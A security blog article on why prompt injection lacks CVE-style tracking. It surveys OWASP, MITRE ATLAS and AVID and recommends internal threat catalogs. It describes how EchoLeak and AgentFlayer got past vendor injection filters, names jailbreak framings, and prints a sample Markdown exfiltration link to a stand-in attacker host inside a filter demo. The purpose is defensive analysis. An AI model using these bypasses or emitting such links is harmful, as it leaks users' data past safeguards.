Prompt Injection: AI’s Biggest Security Risk

When researchers found that Microsoft 365 Copilot could be tricked into leaking corporate data from a single email, the flaw got a clean public identifier: CVE-2025-32711, severity 9.3. When a bug hunter coaxed ChatGPT into producing valid Windows product keys by framing the request as a guessing game, it got nothing. 

Both were prompt injections. Only one is trackable. That vulnerability tracking gap in AI security, and what it costs defenders, is the subject of this article.

What Is a CVE and Why Does It Matter for Software Security?

A CVE (Common Vulnerabilities and Exposures) is a unique public identifier for a specific software flaw. It gives the whole industry one name for one bug, so a researcher in Berlin and an analyst in Bahrain know they mean the same thing.

The Role of MITRE’s CVE Program in Traditional Vulnerability Management

The CVE program is run by the MITRE Corporation, a US nonprofit. Since 1999 it has assigned hundreds of thousands of IDs, each tied to a discrete, reproducible defect in a defined product and version.

A CVE is the connective tissue of coordinated disclosure: a researcher reports the flaw, the vendor patches it, the ID is published, and defenders map it to their own assets. Without that shared label, the same bug ends up with three names and no clear owner.

The National Vulnerability Database (NVD) and CVSS Scoring

The National Vulnerability Database, maintained by NIST, enriches each CVE with a CVSS (Common Vulnerability Scoring System) score from 0 to 10. That lets teams triage: a 9.3 jumps the queue, a 4.0 waits.
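To make the triage step concrete, here is a minimal sketch that maps a CVSS v3.x base score to its qualitative severity band and sorts a backlog by score. The function name and the backlog are illustrative assumptions; the second ID is a made-up placeholder, not a real CVE.

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.x base score to its qualitative severity rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS scores range from 0.0 to 10.0, got {score}")
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


# Hypothetical backlog. The first ID is the EchoLeak CVE cited earlier;
# the second is a placeholder invented for this example.
backlog = [("CVE-0000-00000", 4.0), ("CVE-2025-32711", 9.3)]

# Triage: highest score first, so the 9.3 jumps the queue and the 4.0 waits.
triage_queue = sorted(backlog, key=lambda item: item[1], reverse=True)
for cve_id, score in triage_queue:
    print(f"{cve_id}: {score} ({cvss_severity(score)})")
```

Real triage usually weighs asset exposure and exploit availability as well; the score is only the starting point.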

Why Prompt Injection Breaks the Traditional CVE Model

The CVE model assumes a bug lives in code, sits in a version, and can be fixed. Prompt injection violates all three.

Prompt Injection as a Class of Attack, Not a Discrete Bug

Prompt injection smuggles instructions into the data an LLM reads, so the model follows the attacker rather than the user. OWASP ranks it as LLM01, the top entry in its 2025 Top 10 for LLM Applications. It is a property of how language models work, not one line of faulty code, so at the level of the class itself there is nothing to file a CVE against.

A SQL injection either works or it does not. A prompt injection might succeed ten times in a row, fail on the eleventh, then stop working altogether after a silent model update, which makes the “reproducible” part of reporting genuinely hard.
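One way to report a probabilistic exploit honestly is to state a success rate with an uncertainty range rather than a yes or no. The sketch below uses the Wilson score interval for a binomial proportion. The trial counts are hypothetical, and the function name is an assumption made for this example.

```python
import math


def wilson_interval(successes: int, trials: int, z: float = 1.96) -> tuple[float, float]:
    """Wilson score interval for a binomial proportion (z=1.96 is roughly 95% confidence)."""
    if trials <= 0 or not 0 <= successes <= trials:
        raise ValueError("need trials > 0 and 0 <= successes <= trials")
    p_hat = successes / trials
    denom = 1 + z**2 / trials
    centre = (p_hat + z**2 / (2 * trials)) / denom
    half_width = z * math.sqrt(p_hat * (1 - p_hat) / trials + z**2 / (4 * trials**2)) / denom
    return max(0.0, centre - half_width), min(1.0, centre + half_width)


# Hypothetical test run: the payload worked on 10 of 11 attempts.
low, high = wilson_interval(successes=10, trials=11)
print(f"observed rate {10 / 11:.0%}, plausible range {low:.0%} to {high:.0%}")
```

With only eleven attempts the range is wide, which is the point: a handful of trials says little about how often an attack really lands, and the estimate only holds for the model as it behaved on the day of testing.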

Model Versioning vs. Software Versioning

Software has clean version numbers. A weight update to a hosted model can ship silently, with no version a researcher can cite. Two calls to “gpt-4o” a week apart may not behave the same way, and there is no changelog to point at.

Why “Patching” an LLM Differs From Patching Code

Patching code closes a specific hole. A developer rewrites the faulty line, ships the diff, and the exploit path is gone for good. That clean, binary, auditable loop is the entire premise on which the CVE system rests. “Patching” a model offers none of it. There is no single line to fix, because the behavior the attacker abused is the same behavior that makes the model useful: it reads text and follows instructions. A vendor has three levers: retraining, hardening the system prompt, or wrapping the model in input and output guardrails. All of them lower the odds of a successful attack rather than removing the possibility.

A fix might cut the success rate from 80 percent to 5 percent, and the vendor marks the issue as remediated. The hole is narrower, not closed.
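The arithmetic behind "narrower, not closed" is worth spelling out. If each attempt succeeds independently with probability p, the chance that at least one of n attempts succeeds is 1 - (1 - p)^n. The sketch below applies that to the illustrative 80 percent and 5 percent figures. Independence between attempts is an assumption, and real attackers who adapt their prompts may do better.

```python
def chance_of_any_success(per_attempt_rate: float, attempts: int) -> float:
    """Probability that at least one of `attempts` independent tries succeeds."""
    if not 0.0 <= per_attempt_rate <= 1.0:
        raise ValueError("per_attempt_rate must be between 0 and 1")
    if attempts < 0:
        raise ValueError("attempts must be non-negative")
    return 1.0 - (1.0 - per_attempt_rate) ** attempts


# Compare the illustrative pre-fix (80%) and post-fix (5%) rates
# for an attacker who can simply retry.
for rate in (0.80, 0.05):
    for attempts in (1, 10, 50):
        odds = chance_of_any_success(rate, attempts)
        print(f"per-attempt {rate:.0%}, {attempts:>2} attempts -> {odds:.1%} chance of at least one success")
```

Because retries are cheap for an automated attacker, even a low per-attempt rate compounds quickly.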

The recent record shows how thin that margin is. EchoLeak got past Microsoft’s dedicated cross-prompt-injection classifier by hiding its exfiltration channel in reference-style Markdown that the filter did not recognize, and the AgentFlayer exploit slipped through OpenAI’s URL safety check by routing stolen data through trusted Azure Blob Storage links. Each guardrail worked against the obvious version of the attack and fell to a rephrasing. There is a tuning tax on top of that: crank the filters too tight and the model starts refusing legitimate work, so vendors settle for a balance point rather than elimination. 
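A toy example shows how a guardrail can catch the obvious form of a payload and miss an equivalent one. The regex filter below is an illustration written for this article, not Microsoft's classifier or any vendor's real check. It strips inline Markdown links and images but does not recognize the reference-style syntax for the same link. The domain is a reserved example name and SECRET stands in for leaked data.

```python
import re

# Naive guardrail: matches inline Markdown links and images,
# e.g. [text](url) or ![alt](url). Reference-style links are not covered.
INLINE_LINK = re.compile(r"!?\[[^\]]*\]\([^)]*\)")


def naive_filter(model_output: str) -> str:
    """Replace inline Markdown links/images with a placeholder."""
    return INLINE_LINK.sub("[link removed]", model_output)


# Two ways of writing the same image link.
inline_form = "![status](https://attacker.example/log?d=SECRET)"
reference_form = "![status][r1]\n\n[r1]: https://attacker.example/log?d=SECRET"

print(naive_filter(inline_form))     # the inline link is replaced
print(naive_filter(reference_form))  # the URL survives: same link, different syntax
```

Adding a second pattern would close this particular gap, but the next rephrasing would need a third, which is the dynamic the incidents above illustrate.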

The practical takeaway is to treat “we’ve addressed this” as risk reduction, not closure.

The Current State of AI Vulnerability Tracking

Several frameworks exist. None is a true registry of individual, citable prompt injection vulnerabilities.

OWASP LLM Top 10 and the LLM01 Classification

The OWASP GenAI Security Project’s LLM01:2025 entry is the most cited reference point. It is a category, not a catalog: it does not enumerate specific incidents with IDs.

MITRE ATLAS for Adversarial AI Threats

MITRE ATLAS is an ATT&CK-style knowledge base of adversarial tactics against AI systems, documenting 16 tactics and more than 80 techniques with real-world case studies as of late 2025. It maps how attacks work, but is not a per-vulnerability ledger with scores.

AVID (AI Vulnerability Database) and Its Limitations

AVID, run by a nonprofit, is the closest thing to a dedicated AI vulnerability database, cataloging failure modes with reproducible evidence. But it leans on community submissions, skews toward bias and broader failure modes, and notes that the definition of an “AI vulnerability” is itself still a working one.

Vendor-Specific Disclosures vs. Industry-Wide Registries

Disclosure happens vendor by vendor. OpenAI patched the Windows-key jailbreak server-side; Microsoft fixed EchoLeak and issued a CVE. There is no common venue where these land side by side.

 

The Consequences of No Shared Threat Registry for Prompt Injection

Fragmented Disclosure Across AI Vendors

Each lab discloses on its own terms, on its own blog, if at all. A defender protecting a multi-model stack has to monitor a dozen channels and hope nothing slips by.

Duplicate Discovery and Wasted Research Effort

Researchers rediscover the same attack repeatedly. The guessing-game jailbreak, the “dead grandma” trick, and other framing attacks are variations on one theme nobody numbered.

No Standardized Severity Scoring for LLM Attacks

CVSS was built for deterministic flaws. There is no agreed way to score an attack that is probabilistic and context-dependent, so “how bad is this” has no common answer.

Slower Defender Response Times

Without a feed to subscribe to, teams learn about LLM attacks from news and conference talks rather than a structured alert.

Challenges for Enterprise Risk Assessment and Procurement

Buyers cannot ask a vendor, “which known prompt injection issues affect your product, and are they fixed?” the way they can with CVEs. That makes enterprise risk assessment and procurement an exercise in trust rather than evidence.

Why a CVE-Like System for Prompt Injection Is Hard to Build

Reproducibility Challenges Across Model Updates

A CVE entry promises that anyone can reproduce the flaw. That guarantee is what lets a researcher verify it, a vendor confirm it, and a defender test whether their own systems are exposed. A hosted model breaks the promise on both ends. The same prompt can fail on the eleventh attempt because of normal sampling variance, and the weights themselves can change between Tuesday and Wednesday with no version bump to point to. A proof of concept that worked at disclosure may quietly stop working a week later, not because anyone fixed it, but because the model drifted. An identifier is only as useful as the thing it points to, and here the thing keeps moving.

Closed-Weight Models and Disclosure Asymmetry

With closed-weight models from OpenAI, Anthropic, Google, and others, only the lab sees the internals. Outsiders report behavior; the provider decides what to confirm and disclose. That puts the entity with the most information in sole control of how much reaches the public, and the incentives do not favor openness. Confirming a flaw invites scrutiny, while a silent server-side fix attracts none. A neutral registry depends on independent parties being able to validate and publish, and closed weights leave them able to observe symptoms but never inspect the cause.

The Blurred Line Between Bug, Feature, and Misuse

Is a model following an instruction inside a document a bug, or is the feature working as designed? A registry needs a clear yes or no on “is this a vulnerability,” and prompt injection rarely offers one. The model is doing exactly what it was built to do: read text and act on it. Whether that counts as a defect depends entirely on context the model cannot see, namely, whose instruction it was and whether the user wanted it followed. That ambiguity also gives vendors an easy out, since “working as intended” is a defensible label for behavior nobody can cleanly call broken. A catalog cannot index something the industry will not agree to name.

Shared Responsibility Between Model Providers and Application Developers

A prompt injection usually turns dangerous only when an application wires the model to tools, data, and actions through RAG, connectors, or agents. Responsibility is split between the provider and the developer, and neither side owns the whole failure. The model provider can argue that the model behaved normally and the integration was unsafe; the developer can argue that they were relying on the model to resist manipulation. Both have a point, which is precisely the problem. With no clear owner, there is no clear party to file the disclosure, assign the severity, or ship the fix, and the issue falls into the gap between them.

Proposed Frameworks for an AI Threat Registry

Extending CVE to Cover Model-Level Vulnerabilities

One option is to stretch the existing CVE schema to cover model behaviors, accepting probabilistic, version-fuzzy entries. It reuses trusted infrastructure but strains reproducibility norms.

Creating a Dedicated Prompt Injection Disclosure Standard

Another is a purpose-built standard with its own identifiers, severity model, and reproducibility rules, designed for non-determinism from the start.

Lessons From CVE Numbering Authorities (CNAs) Applied to AI Labs

The CVE program already delegates ID assignment to CNAs (CVE Numbering Authorities), often the vendors themselves. AI labs could become CNAs for their own models, issuing identifiers under shared rules, as Microsoft does for Copilot.

Coordinated Vulnerability Disclosure (CVD) for LLMs

Underpinning all of it is Coordinated Vulnerability Disclosure: agreed timelines, safe harbor for researchers, and a standard report format adapted to AI’s quirks.

 

What Enterprises Can Do Until a Registry Exists

Building Internal Prompt Injection Threat Catalogs

Keep a catalog of every injection technique that affects your deployed AI, with prompts, conditions, and mitigations, so you are not rediscovering attacks each quarter.
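A catalog like this can start as a small structured record per technique. The sketch below is one possible shape, not a standard: the class name, field names, ID format, and sample values are all assumptions made for illustration.

```python
import json
from dataclasses import asdict, dataclass, field


@dataclass
class InjectionCatalogEntry:
    """One internal record of a prompt injection technique (hypothetical schema)."""
    entry_id: str               # internal ID, format chosen by your team
    technique: str              # short human-readable name
    example_prompts: list[str]  # payloads, or pointers to where they are stored
    conditions: str             # when the technique works
    mitigations: list[str] = field(default_factory=list)
    affected_systems: list[str] = field(default_factory=list)


catalog = [
    InjectionCatalogEntry(
        entry_id="PI-0001",
        technique="Guessing-game framing",
        example_prompts=["<redacted: keep real payloads in a restricted store>"],
        conditions="Multi-turn chat; request reframed as a game",
        mitigations=["Output filter for license-key patterns"],
        affected_systems=["internal-helpdesk-bot"],
    ),
]

# Serialize to JSON so the catalog can live in version control.
print(json.dumps([asdict(entry) for entry in catalog], indent=2))
```

Keeping the records in plain JSON under version control gives you a change history for free, which helps when a technique stops or starts working after a model update.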

Subscribing to AI-Specific Threat Intelligence Feeds

Follow AI security research as a dedicated intelligence stream, not incidental news. Outlets like Wired and academic preprints on arXiv tend to surface novel attacks well before any vendor advisory does.

Participating in AI Red Team Communities

Red teaming is the only reliable way to know how your specific stack fails. Testing against your own guardrails, RAG pipelines, and agents finds issues no external list would hold.

Tracking OWASP, MITRE ATLAS, and AVID Updates

Treat OWASP’s LLM Top 10, MITRE ATLAS, and AVID as your standing reference set and check them on a schedule.

Pro Tip: Map your internal catalog to ATLAS technique IDs and OWASP LLM categories as you build it. When a real standard arrives your records translate instead of needing a rebuild, and meanwhile auditors get a recognized vocabulary to assess against.
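In practice the mapping can be as simple as a tag table keyed by your internal IDs. The sketch below is a minimal example. The internal IDs are hypothetical, and the ATLAS technique IDs and OWASP label are assumptions that should be checked against the current ATLAS matrix and OWASP list before you rely on them.

```python
from collections import defaultdict

# Assumed external identifiers; verify them against the live frameworks.
catalog_tags = {
    "PI-0001": {"atlas": ["AML.T0054"], "owasp": ["LLM01:2025"]},
    "PI-0002": {"atlas": ["AML.T0051"], "owasp": ["LLM01:2025"]},
}


def index_by_framework(tags: dict, framework: str) -> dict:
    """Invert the tag table: external ID -> list of internal catalog entry IDs."""
    index = defaultdict(list)
    for entry_id, ids in tags.items():
        for external_id in ids.get(framework, []):
            index[external_id].append(entry_id)
    return dict(index)


print(index_by_framework(catalog_tags, "owasp"))
print(index_by_framework(catalog_tags, "atlas"))
```

The inverted index answers the question an auditor is likely to ask: which of your recorded issues fall under a given category.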

The Path Forward: Standardizing AI Vulnerability Disclosure

Industry Collaboration Between AI Labs, Researchers, and Regulators

No single lab can run a credible cross-vendor registry; rivals will not report into a competitor’s database. It needs a neutral steward, plausibly MITRE or a NIST-backed consortium, with labs participating as authorities.

Regulatory Pressure From the EU AI Act and NIST AI RMF

The EU AI Act imposes obligations on high-risk and general-purpose AI, including incident reporting, while the NIST AI Risk Management Framework and ISO/IEC 42001 push toward documented, auditable AI risk processes. Structured disclosure is the natural next requirement.

A Call for a Public AI Vulnerability Database

The destination is a public, neutral, AI-native vulnerability database: shared IDs, a severity model built for probabilistic attacks, and disclosure rules every major lab signs onto. We are not there yet, so everything above is a stopgap.

 

Conclusion

Prompt injection is the top-ranked risk in AI security and the least trackable. It earns a CVE only when it surfaces inside a discrete product; the model-level root cause and server-side fixes leave no public trace. Until the industry builds an AI-native registry with a severity model fit for non-deterministic attacks, defenders must stitch together OWASP categories, ATLAS techniques, AVID entries, and their own catalogs. Build that internal catalog now. It is the one piece you fully control.

Frequently Asked Questions

Is there a CVE for prompt injection?

Sometimes. When it manifests in a specific product, like EchoLeak in Microsoft 365 Copilot (CVE-2025-32711) or CurXecute in Cursor (CVE-2025-54135), it can receive a CVE. The general attack class against language models has none.

Why does prompt injection as a class not have a CVE?

Because it is a class of behavior, not a discrete code defect. It is probabilistic, it can break across silent model updates, and it often has no single fix, all of which clash with the reproducibility a CVE assumes.

Is there a database of AI vulnerabilities?

AVID is the nearest dedicated database, while OWASP’s LLM Top 10 and MITRE ATLAS are the dominant classification frameworks. None is a complete, citable registry of individual vulnerabilities.

How do AI vendors disclose prompt injection flaws?

Inconsistently. Some patch silently server-side, some publish blog write-ups, and some issue CVEs when the flaw sits in a versioned product.

Does MITRE ATLAS replace a CVE-style registry?

No. ATLAS catalogs tactics and techniques, not individual scored vulnerabilities, so it complements a CVE-style registry rather than replacing one.

Could the CVE system be extended to cover prompt injection?

Possibly. AI labs could act as CVE Numbering Authorities, but the non-deterministic nature of prompt injection makes full coverage unlikely without a purpose-built standard.

Axipro Author

Pedro Dias

Pedro has been writing online for over 10 years. With experience in all things programming, cyber security, and compliance, he is our editor-in-chief at Axipro.
